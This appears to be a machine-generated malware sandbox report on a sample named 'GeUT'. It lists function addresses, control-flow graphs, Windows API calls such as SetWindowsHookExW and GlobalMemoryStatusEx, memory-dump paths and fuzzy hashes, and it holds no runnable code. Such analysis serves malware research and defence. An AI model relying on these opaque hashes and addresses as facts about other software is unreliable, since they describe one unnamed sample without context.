                                control_flow_graph 235 2a92333-2a923be ResumeThread 237 2a923c0-2a923c6 235->237 238 2a923c7-2a923f5 235->238 237->238
                                APIs
                                • ResumeThread.KERNELBASE(?), ref: 02A923AE
                                Memory Dump Source
                                • Source File: 00000004.00000002.1507583295.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2a90000_GeUT.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 8ef8a06ea12ade99d3340e2015343134a1c440edd8b7f2db3adba03d96595ef4
                                • Instruction ID: 3af42b73e95511173610ec758c1e59ca542a0e39fe0c125f35e4c2e322c03b42
                                • Opcode Fuzzy Hash: 8ef8a06ea12ade99d3340e2015343134a1c440edd8b7f2db3adba03d96595ef4
                                • Instruction Fuzzy Hash: BB21AAB9D002099FCB10CFAAD884ADEFBF4AB49324F24905AE914B3310C775A945CFA4
                                Function 02A92338 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 241 2a92338-2a923be ResumeThread 242 2a923c0-2a923c6 241->242 243 2a923c7-2a923f5 241->243 242->243
                                APIs
                                • ResumeThread.KERNELBASE(?), ref: 02A923AE
                                Memory Dump Source
                                • Source File: 00000004.00000002.1507583295.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2a90000_GeUT.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 88796053e0acb9c39647ef8c9dcc768ba53fc68b9db546e22eec158125408200
                                • Instruction ID: c5ed1f05f07a0856d328d97c859dd1209be9dfbd023432ab456d4daafe23f7c8
                                • Opcode Fuzzy Hash: 88796053e0acb9c39647ef8c9dcc768ba53fc68b9db546e22eec158125408200
                                • Instruction Fuzzy Hash: FF2188B8D002199FCB10CFAAD584ADEFBF4AB49324F24905AE918B7310D775A945CFA4

                                Execution Graph

                                Execution Coverage:11.5%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:210
                                Total number of Limit Nodes:19
                                execution_graph 65746 5d8bcb8 65748 5d8bd12 65746->65748 65747 5d8bdc7 65748->65747 65749 5d8bd97 GetCurrentThreadId 65748->65749 65749->65747 65523 5d872d9 65524 5d872de 65523->65524 65525 5d87302 65524->65525 65533 5d81afc 65524->65533 65527 5d81afc SendMessageW 65525->65527 65529 5d8730e 65527->65529 65528 5d872f4 65538 5d86a84 65528->65538 65531 5d86a84 SendMessageW 65529->65531 65532 5d8731c 65531->65532 65535 5d81b07 65533->65535 65534 5d88f8e 65534->65528 65535->65534 65542 5d87860 65535->65542 65539 5d86a8f 65538->65539 65540 5d87860 SendMessageW 65539->65540 65541 5d88ff9 65540->65541 65541->65525 65543 5d89010 SendMessageW 65542->65543 65544 5d88ff9 65543->65544 65544->65528 65545 6ca0888 65547 6ca08b4 65545->65547 65546 6ca098e 65547->65546 65549 6ca0a10 65547->65549 65550 6ca0a1f 65549->65550 65554 6ca14a8 65550->65554 65558 6ca1698 65550->65558 65551 6ca0b26 65551->65551 65555 6ca14ad 65554->65555 65562 6ca5d18 65555->65562 65556 6ca194a 65556->65551 65559 6ca16ad 65558->65559 65561 6ca5d18 3 API calls 65559->65561 65560 6ca194a 65560->65551 65561->65560 65563 6ca5d4c 65562->65563 65567 6ca5f18 65563->65567 65571 6ca5f28 65563->65571 65564 6ca5dae 65564->65556 65575 6ca5f60 65567->65575 65583 6ca5f51 65567->65583 65568 6ca5f36 65568->65564 65572 6ca5f36 65571->65572 65573 6ca5f60 2 API calls 65571->65573 65574 6ca5f51 2 API calls 65571->65574 65572->65564 65573->65572 65574->65572 65576 6ca5f6d 65575->65576 65577 6ca5f95 65575->65577 65576->65568 65591 6ca41f0 65577->65591 65580 6ca5fb6 65580->65568 65581 6ca607e GlobalMemoryStatusEx 65582 6ca60ae 65581->65582 65582->65568 65584 6ca5f95 65583->65584 65585 6ca5f6d 65583->65585 65586 6ca41f0 GlobalMemoryStatusEx 65584->65586 65585->65568 65587 6ca5fb2 65586->65587 65588 6ca5fb6 65587->65588 65589 6ca607e GlobalMemoryStatusEx 65587->65589 65588->65568 65590 6ca60ae 65589->65590 65590->65568 65592 6ca6038 GlobalMemoryStatusEx 65591->65592 65594 6ca5fb2 65592->65594 65594->65580 65594->65581 65595 123d4f0 65596 123d513 65595->65596 65601 123a01c KiUserCallbackDispatcher KiUserCallbackDispatcher 65596->65601 65598 123e267 65602 123a01c KiUserCallbackDispatcher KiUserCallbackDispatcher 65598->65602 65600 123e277 65601->65598 65602->65600 65603 1238e70 65604 1238eb6 GetCurrentProcess 65603->65604 65606 1238f01 65604->65606 65607 1238f08 GetCurrentThread 65604->65607 65606->65607 65608 1238f45 GetCurrentProcess 65607->65608 65609 1238f3e 65607->65609 65610 1238f7b 65608->65610 65609->65608 65615 1239041 65610->65615 65619 1239050 65610->65619 65611 1238fa3 GetCurrentThreadId 65612 1238fd4 65611->65612 65616 1239050 65615->65616 65622 1238b54 65616->65622 65620 1238b54 DuplicateHandle 65619->65620 65621 123907e 65620->65621 65621->65611 65623 12390b8 DuplicateHandle 65622->65623 65624 123907e 65623->65624 65624->65611 65625 5d8ac00 65626 5d8ac12 65625->65626 65632 12396c0 65626->65632 65636 1237456 65626->65636 65640 1237444 65626->65640 65644 1237441 65626->65644 65633 12396fe 65632->65633 65648 1238c24 65633->65648 65635 123971e 65637 1237449 65636->65637 65638 1238c24 2 API calls 65637->65638 65639 123971e 65638->65639 65641 1237449 65640->65641 65642 1238c24 2 API calls 65641->65642 65643 123971e 65642->65643 65643->65643 65646 1237449 65644->65646 65645 1238c24 2 API calls 65647 123971e 65645->65647 65646->65645 65647->65647 65649 1238c2f 65648->65649 65650 123a244 65649->65650 65654 123be10 65649->65654 65660 123bee0 65649->65660 65665 123bddf 65649->65665 65650->65635 65655 123be13 65654->65655 65656 123be70 65654->65656 65655->65650 65657 123be72 65656->65657 65671 123c090 65656->65671 65675 123c082 65656->65675 65657->65650 65661 123bf01 65660->65661 65662 123bf25 65661->65662 65663 123c082 2 API calls 65661->65663 65664 123c090 2 API calls 65661->65664 65662->65650 65663->65662 65664->65662 65666 123bdea 65665->65666 65667 123be5f 65665->65667 65666->65650 65668 123be72 65667->65668 65669 123c082 2 API calls 65667->65669 65670 123c090 2 API calls 65667->65670 65668->65650 65669->65668 65670->65668 65672 123c09d 65671->65672 65673 123c0d6 65672->65673 65682 1239e4c 65672->65682 65673->65657 65676 123c08b 65675->65676 65677 123c0e8 65675->65677 65679 123c0d6 65676->65679 65681 1239e4c 2 API calls 65676->65681 65678 123c148 65677->65678 65680 1239e80 2 API calls 65677->65680 65679->65657 65680->65678 65681->65679 65683 1239e57 65682->65683 65685 123c148 65683->65685 65686 1239e80 65683->65686 65685->65685 65687 1239e8b 65686->65687 65693 1239e90 65687->65693 65690 123c1c6 65690->65685 65694 1239e9b 65693->65694 65707 123d0b4 65694->65707 65696 123c1b7 65699 123f898 65696->65699 65703 123f460 65696->65703 65697 123bee0 2 API calls 65697->65696 65698 123d2b0 65698->65696 65698->65697 65700 123f8c6 65699->65700 65701 123f992 KiUserCallbackDispatcher 65700->65701 65702 123f997 65700->65702 65701->65702 65704 123f482 65703->65704 65706 123f4e8 65703->65706 65705 123f992 KiUserCallbackDispatcher 65704->65705 65704->65706 65705->65706 65706->65690 65708 123d0bf 65707->65708 65710 123eb80 65708->65710 65711 123a01c KiUserCallbackDispatcher KiUserCallbackDispatcher 65708->65711 65710->65698 65711->65710 65712 5d87200 65714 5d87229 65712->65714 65713 5d8731c 65714->65713 65715 5d872c9 65714->65715 65724 5d86a74 CreateIconFromResourceEx SendMessageW CreateIconFromResourceEx CreateIconFromResourceEx 65714->65724 65716 5d87302 65715->65716 65717 5d81afc SendMessageW 65715->65717 65718 5d81afc SendMessageW 65716->65718 65719 5d872f4 65717->65719 65720 5d8730e 65718->65720 65721 5d86a84 SendMessageW 65719->65721 65722 5d86a84 SendMessageW 65720->65722 65721->65716 65722->65713 65724->65715 65750 5d874b0 65751 5d874c1 65750->65751 65754 5d8752b 65751->65754 65755 5d86af8 65751->65755 65756 5d86b03 65755->65756 65757 5d87524 65756->65757 65760 5d88c40 65756->65760 65767 5d88c50 65756->65767 65761 5d88c50 65760->65761 65773 5d8781c 65761->65773 65764 5d88c77 65764->65757 65765 5d88ca0 CreateIconFromResourceEx 65766 5d88d1e 65765->65766 65766->65757 65768 5d8781c CreateIconFromResourceEx 65767->65768 65769 5d88c6a 65768->65769 65770 5d88c77 65769->65770 65771 5d88ca0 CreateIconFromResourceEx 65769->65771 65770->65757 65772 5d88d1e 65771->65772 65772->65757 65774 5d88ca0 CreateIconFromResourceEx 65773->65774 65775 5d88c6a 65774->65775 65775->65764 65775->65765 65725 6ca0990 65727 6ca0967 65725->65727 65726 6ca098e 65727->65726 65728 6ca0a10 3 API calls 65727->65728 65728->65727 65729 1233bf8 65730 1233c3c SetWindowsHookExW 65729->65730 65732 1233c82 65730->65732 65733 1233a78 65734 1233a87 65733->65734 65735 1233a92 65734->65735 65738 1237d68 65734->65738 65742 1237d59 65734->65742 65739 1237d77 65738->65739 65740 1237444 2 API calls 65739->65740 65741 1237d98 65740->65741 65741->65735 65743 1237d77 65742->65743 65744 1237444 2 API calls 65743->65744 65745 1237d98 65744->65745 65745->65735 65776 5d8bf23 65777 5d8bf36 65776->65777 65781 5d8c608 65777->65781 65784 5d8c610 PostMessageW 65777->65784 65778 5d8bf59 65782 5d8c610 PostMessageW 65781->65782 65783 5d8c67c 65782->65783 65783->65778 65785 5d8c67c 65784->65785 65785->65778

                                Executed Functions

                                Function 07CB6AB8 Relevance: .8, Instructions: 826COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757307263.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7cb0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1170cde1aaa263a8faa642989436214602fd4ab37c64c86a9d2fd05c1613670c
                                • Instruction ID: ae25cf8c52e7a2e1c4ac660ab0c55a11fb52f1061d7821fbf8015d252424ec91
                                • Opcode Fuzzy Hash: 1170cde1aaa263a8faa642989436214602fd4ab37c64c86a9d2fd05c1613670c
                                • Instruction Fuzzy Hash: 28928F74D11229CFDB64DF64C994ADDB7B1BF89300F5086EAD809A7260EB35AE85CF40
                                Function 07CF0448 Relevance: .4, Instructions: 428COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757700715.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7cf0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b6d191612bdcc26239cb867169571cc48730dd6ff23700d1df42506263cb11db
                                • Instruction ID: 04614cbfe0010af226c3a6944f8c06b4a6c1cb88cbc848d8f4454661c6f3c8c3
                                • Opcode Fuzzy Hash: b6d191612bdcc26239cb867169571cc48730dd6ff23700d1df42506263cb11db
                                • Instruction Fuzzy Hash: 6432CD74E01218CFCB64DFA8C898A9DBBB2FF49311F1085A9D409AB355DB359D86CF50
                                Function 07CF2B5B Relevance: .4, Instructions: 408COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757700715.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7cf0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 35b64d3ebde03752e8e56c013041cef7c3031acbbcf6cdfc99b15d502c3dfc98
                                • Instruction ID: a12397ce859c2d2d641431eac0b42db81b8285438546a3c860946e52bfe8c47e
                                • Opcode Fuzzy Hash: 35b64d3ebde03752e8e56c013041cef7c3031acbbcf6cdfc99b15d502c3dfc98
                                • Instruction Fuzzy Hash: DA225DB4901229CFDBA4DF69D984BDDBBB2BF49300F1085E9D909A7260DB309E85CF51
                                Function 07CB564F Relevance: .4, Instructions: 384COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757307263.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7cb0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 72c09f78f60568b7bfc72adc4668d671ff37e226f47ad5eabccf4b4ba6e23061
                                • Instruction ID: 7e6fd45282180ae389bc062388801ac18eb6497bd7e5fc321a16bfb9f4baad23
                                • Opcode Fuzzy Hash: 72c09f78f60568b7bfc72adc4668d671ff37e226f47ad5eabccf4b4ba6e23061
                                • Instruction Fuzzy Hash: 0A02A1B4E01219CFDB68CF6AD984BDDBBB2BF89300F1481A9D409A7351DB359A85CF10
                                Function 07CF9D39 Relevance: .3, Instructions: 343COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757700715.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7cf0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0686fe33d07af2079f38e3c0b95df02a63818fb360938b4b02f80d8ebf28a18b
                                • Instruction ID: 64560231b9b1cbfa8d85824bcf66aea12107f6c563f88013e58372a0eb1b0cfe
                                • Opcode Fuzzy Hash: 0686fe33d07af2079f38e3c0b95df02a63818fb360938b4b02f80d8ebf28a18b
                                • Instruction Fuzzy Hash: AD029274E01219CFDF64CFA4D984BDDBBB2BF49301F2081AAE909A7250DB319A91DF50
                                Function 07CF03CD Relevance: .3, Instructions: 329COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757700715.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7cf0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 60f27f52966a818cb1a6cfeaa26e9cbebbcf481e9bdf5e04012bed2d78133456
                                • Instruction ID: 70495283712748af6e3e1c0d39c0b786cbbbc994870d95d800a129b347265109
                                • Opcode Fuzzy Hash: 60f27f52966a818cb1a6cfeaa26e9cbebbcf481e9bdf5e04012bed2d78133456
                                • Instruction Fuzzy Hash: 16F1F5B4E01258CFCB55DFA8C894AADBBB1FF89301F1081AAD449AB355DB349D86CF50
                                Function 07A3B8F8 Relevance: .3, Instructions: 326COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.2756353336.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7a30000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: baae2cc001d3889777ed30ff4d1e29de6be4ae6cc736986bc7866c607099adc5
                                • Instruction ID: 465eabc0dece7a975a5594bfc9d772b7f7b0fd369858421d35dc27d28c3a6abb
                                • Opcode Fuzzy Hash: baae2cc001d3889777ed30ff4d1e29de6be4ae6cc736986bc7866c607099adc5
                                • Instruction Fuzzy Hash: 17F18474E01259CFCB64CFA9D890A9DBBB2FF89300F1085A9D819A7355DB35AD82CF50
                                Function 07CB6AA8 Relevance: .3, Instructions: 313COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757307263.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7cb0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2277e14cce84f7d63fc05a190de7776ede2099bb5c3f82bafdd7f3a6186fa0a6
                                • Instruction ID: 592017519906b122d2f4fb3272398942492b40d53828243dcffab9136b44787b
                                • Opcode Fuzzy Hash: 2277e14cce84f7d63fc05a190de7776ede2099bb5c3f82bafdd7f3a6186fa0a6
                                • Instruction Fuzzy Hash: 74E1C370D1066ACBCB24EF64D9906DDB7B1FF99300F609AAAD40977210EB35AAC5CF40
                                Function 07CB0768 Relevance: .2, Instructions: 239COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757307263.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7cb0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bb377abaece82fd14daa1100449e0a0db55b1ed0e0da8f91f57ca3413a162f87
                                • Instruction ID: 336e157cceb3a43b65662be4684b2d1e94adfa15d1a08d8b41d4e05c069a601f
                                • Opcode Fuzzy Hash: bb377abaece82fd14daa1100449e0a0db55b1ed0e0da8f91f57ca3413a162f87
                                • Instruction Fuzzy Hash: D9A1B274D012198FDB24CFA5C984BDEFBF6BF89300F1581AAD409AB251EB749A85CF50
                                Function 07CB0778 Relevance: .2, Instructions: 230COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757307263.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7cb0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e7683e3dd1f338189e6c65a8fcc8ccce31543d000baa19be0e98355bf7fb9aba
                                • Instruction ID: c4525f5b3958e55b7f79ef5d0b67254dc52c56909789b65905311bfdba908d6d
                                • Opcode Fuzzy Hash: e7683e3dd1f338189e6c65a8fcc8ccce31543d000baa19be0e98355bf7fb9aba
                                • Instruction Fuzzy Hash: 6AA1B274D012198FDB14CFA5C984BDEBBF6BF89300F1581AAD409AB251EB74AA85CF50
                                Function 07CFEBBB Relevance: .2, Instructions: 176COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757700715.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7cf0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8527f3ceac8b3806bbc81c25b9db1302f61b8c60053a9b908b0f1df71fcf4f6f
                                • Instruction ID: 9cca0e9f3908b630fb5481e86f26443ca03d052de368625cf2d3543e69bb4048
                                • Opcode Fuzzy Hash: 8527f3ceac8b3806bbc81c25b9db1302f61b8c60053a9b908b0f1df71fcf4f6f
                                • Instruction Fuzzy Hash: 7D81C0B4D00248DFDF58DFA5D884AEDBFB2BF89300F24812AE915AB264DB315852DF41
                                Function 07CF458B Relevance: .2, Instructions: 163COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757700715.0000000007CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CF0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7cf0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3f6ad97b1cf4be79dc8aa889c8262b8348cbe4fa25328a3eb8f0361e1e4fcdf2
                                • Instruction ID: e04d6253a6284e2a8847576df29e27dda4eb7e14c84205e9623f2d82c092ed7c
                                • Opcode Fuzzy Hash: 3f6ad97b1cf4be79dc8aa889c8262b8348cbe4fa25328a3eb8f0361e1e4fcdf2
                                • Instruction Fuzzy Hash: CE71C2B4E00228CFDBA8DF69D854B9DBBB2BF89300F1081AAD559A7351DB301E85CF51
                                Function 07CB44E0 Relevance: .1, Instructions: 135COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.2757307263.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7cb0000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7f0718651c117900f74ec25f5557ba13c994f5a67ad612cbc6139f89df5d4d9a
                                • Instruction ID: 1b0e82c472eb85b5486afa548b4fd28dfa32a8be4ac503fcf1ce5072f8151e14
                                • Opcode Fuzzy Hash: 7f0718651c117900f74ec25f5557ba13c994f5a67ad612cbc6139f89df5d4d9a
                                • Instruction Fuzzy Hash: CA51BAB4E01248DFCB58DFA9D4949DDBBB2FF89310F209129E805AB354DB34A982CF50
                                Function 01238E60 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 135threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 01238EEE
                                • GetCurrentThread.KERNEL32 ref: 01238F2B
                                • GetCurrentProcess.KERNEL32 ref: 01238F68
                                • GetCurrentThreadId.KERNEL32 ref: 01238FC1
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2741440310.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_1230000_GeUT.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID: _? >
                                • API String ID: 2063062207-3388496716
                                • Opcode ID: de179106f5cc474ccc18bf93f580805eddc076ae85ebae8c798417e0fda78c7d
                                • Instruction ID: d3477b9c9a0ece488d98231ca72ad3774e243553663e8ea8b8de6ef04cf47e9d
                                • Opcode Fuzzy Hash: de179106f5cc474ccc18bf93f580805eddc076ae85ebae8c798417e0fda78c7d
                                • Instruction Fuzzy Hash: E75188B09103098FDB14DFAAD948BAEBBF2FB88314F20C559E518A7390D735A944CF65
                                Function 01238E70 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 01238EEE
                                • GetCurrentThread.KERNEL32 ref: 01238F2B
                                • GetCurrentProcess.KERNEL32 ref: 01238F68
                                • GetCurrentThreadId.KERNEL32 ref: 01238FC1
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2741440310.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_1230000_GeUT.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID: _? >
                                • API String ID: 2063062207-3388496716
                                • Opcode ID: b1187e861246f1b7dcf173c8a4c2f67e3f6dacf4d5ac2815b303ad748b8e4979
                                • Instruction ID: a2b8c091ba4a3f5dba9be8bf6d1c53e68cc23891a374552cbae792fb46d22ae9
                                • Opcode Fuzzy Hash: b1187e861246f1b7dcf173c8a4c2f67e3f6dacf4d5ac2815b303ad748b8e4979
                                • Instruction Fuzzy Hash: 5A5177B091030A8FDB14DFAAD548B9EBBF2BF88314F20C559E518A7390DB34A944CF65
                                Function 05D8BCB8 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 219threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 47 5d8bcb8-5d8bd1c 50 5d8bfaa-5d8c076 47->50 51 5d8bd22-5d8bd3a 47->51 80 5d8c078-5d8c07e 50->80 81 5d8c07f-5d8c093 50->81 56 5d8bd3c-5d8bd42 51->56 57 5d8bd52-5d8bd54 51->57 58 5d8bd44 56->58 59 5d8bd46-5d8bd48 56->59 61 5d8bd64-5d8bd8f 57->61 62 5d8bd56-5d8bd5d 57->62 58->57 59->57 69 5d8bd97-5d8bdc5 GetCurrentThreadId 61->69 62->61 71 5d8bdce-5d8bdd7 69->71 72 5d8bdc7-5d8bdcd 69->72 73 5d8bde8-5d8bdee 71->73 74 5d8bdd9-5d8bddf 71->74 72->71 77 5d8bdf0-5d8bdf5 73->77 78 5d8bdf7-5d8be3d 73->78 74->73 76 5d8bde1 74->76 76->73 77->78 87 5d8be5d-5d8be78 78->87 88 5d8be3f-5d8be55 78->88 80->81 91 5d8be7a 87->91 92 5d8be82 87->92 88->87 91->92 92->50
                                APIs
                                • GetCurrentThreadId.KERNEL32 ref: 05D8BDB1
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2752149915.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5d80000_GeUT.jbxd
                                Similarity
                                • API ID: CurrentThread
                                • String ID: _? >$_? >
                                • API String ID: 2882836952-977242381
                                • Opcode ID: 2ac7f45ffd6c535a6bd32f190a81c407bc91e7eea7e4212d7cd43421b8ce3294
                                • Instruction ID: 5424162fa0b08301c3483b859729eab35def5c6ed2993d307e750ad064e9941b
                                • Opcode Fuzzy Hash: 2ac7f45ffd6c535a6bd32f190a81c407bc91e7eea7e4212d7cd43421b8ce3294
                                • Instruction Fuzzy Hash: 63817B70E003499FDB15EFA5C844AAEBBF6FF88300F14852AD416AB350DB759845CF61
                                Function 07A399B8 Relevance: 4.6, Strings: 3, Instructions: 878COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 94 7a399b8-7a399d8 95 7a399da 94->95 96 7a399df-7a3abe2 call 7a3b650 * 2 94->96 95->96 323 7a3abec-7a3ac09 96->323
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2756353336.0000000007A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7a30000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID: $!$"
                                • API String ID: 0-901016805
                                • Opcode ID: 7410331eeb081a7d9b9587789fb6fbbe616608b4155ca71376a599fc62e9af7c
                                • Instruction ID: bdbdd778100820a1d2316c4bbf837e3a43776054b3ed578d38f033786d12943f
                                • Opcode Fuzzy Hash: 7410331eeb081a7d9b9587789fb6fbbe616608b4155ca71376a599fc62e9af7c
                                • Instruction Fuzzy Hash: 9FA29274A1022C8FEB64DB64DD58BDEBBB2BB88700F1041E9D55A6B2A0DF311E81DF41
                                Function 05D8BCA1 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 142threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 327 5d8bca1-5d8bd1c 331 5d8bfaa-5d8c076 327->331 332 5d8bd22-5d8bd3a 327->332 361 5d8c078-5d8c07e 331->361 362 5d8c07f-5d8c093 331->362 337 5d8bd3c-5d8bd42 332->337 338 5d8bd52-5d8bd54 332->338 339 5d8bd44 337->339 340 5d8bd46-5d8bd48 337->340 342 5d8bd64-5d8bd7f 338->342 343 5d8bd56-5d8bd5d 338->343 339->338 340->338 348 5d8bd87-5d8bd8f 342->348 343->342 350 5d8bd97-5d8bdc5 GetCurrentThreadId 348->350 352 5d8bdce-5d8bdd7 350->352 353 5d8bdc7-5d8bdcd 350->353 354 5d8bde8-5d8bdee 352->354 355 5d8bdd9-5d8bddf 352->355 353->352 358 5d8bdf0-5d8bdf5 354->358 359 5d8bdf7-5d8be3d 354->359 355->354 357 5d8bde1 355->357 357->354 358->359 368 5d8be5d-5d8be78 359->368 369 5d8be3f-5d8be55 359->369 361->362 372 5d8be7a 368->372 373 5d8be82 368->373 369->368 372->373 373->331
                                APIs
                                • GetCurrentThreadId.KERNEL32 ref: 05D8BDB1
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2752149915.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_5d80000_GeUT.jbxd
                                Similarity
                                • API ID: CurrentThread
                                • String ID: _? >
                                • API String ID: 2882836952-3388496716
                                • Opcode ID: 3d102f6048f0d772d4edf9f9201cb1e65f86ccc38f5abfb5ffd774beae8867db
                                • Instruction ID: 28a28aaa59eaf98dcf35f125f4412cda523051df4cd1e630b039cd29b45d6d9f
                                • Opcode Fuzzy Hash: 3d102f6048f0d772d4edf9f9201cb1e65f86ccc38f5abfb5ffd774beae8867db
                                • Instruction Fuzzy Hash: 04519830E003499FEF15EFA5C854AADBBB6FF89700F24816BD416AB360DB799845CB50
                                Function 06CA5F60 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
